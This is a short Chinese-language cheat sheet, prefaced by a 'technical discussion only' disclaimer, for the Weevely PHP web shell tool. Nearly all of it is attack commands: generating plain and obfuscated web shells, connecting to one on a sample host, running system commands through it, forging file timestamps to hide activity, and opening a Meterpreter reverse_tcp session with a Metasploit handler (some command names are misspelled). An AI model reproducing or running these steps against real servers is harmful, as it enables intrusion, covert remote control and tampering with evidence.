注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。
一、生成shell
命令:weevely generate <password> <文件名>
例子:weevely generate shell shell.php
二、连接shell
命令:weevely <URL> <password>
例子:weevely http://192.168.3.248/shell.php shell
三、生成混淆shell
命令:weevely generate -obfuscator cleartext1_php <password> <文件名>
Weevely模块使用
一、信息搜集
:system_info 收集系统信息
:system_info -info 查找自己连接ip
二、文件管理
:file_touch 修改文件时间
:file_touch -human-ts '2004-02-29 16:21:42' 1.txt
三、命令执行
:shell_php 执行php命令
:shell_php system(' ipconfig ')
四、生成meterpreter会话
:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -l host 本机ip -port 端口
MSF设置
use exploit multi/handler
show paylaods
set pauload php/meterpreter/reverse_tcp
show lhost 本机ip
run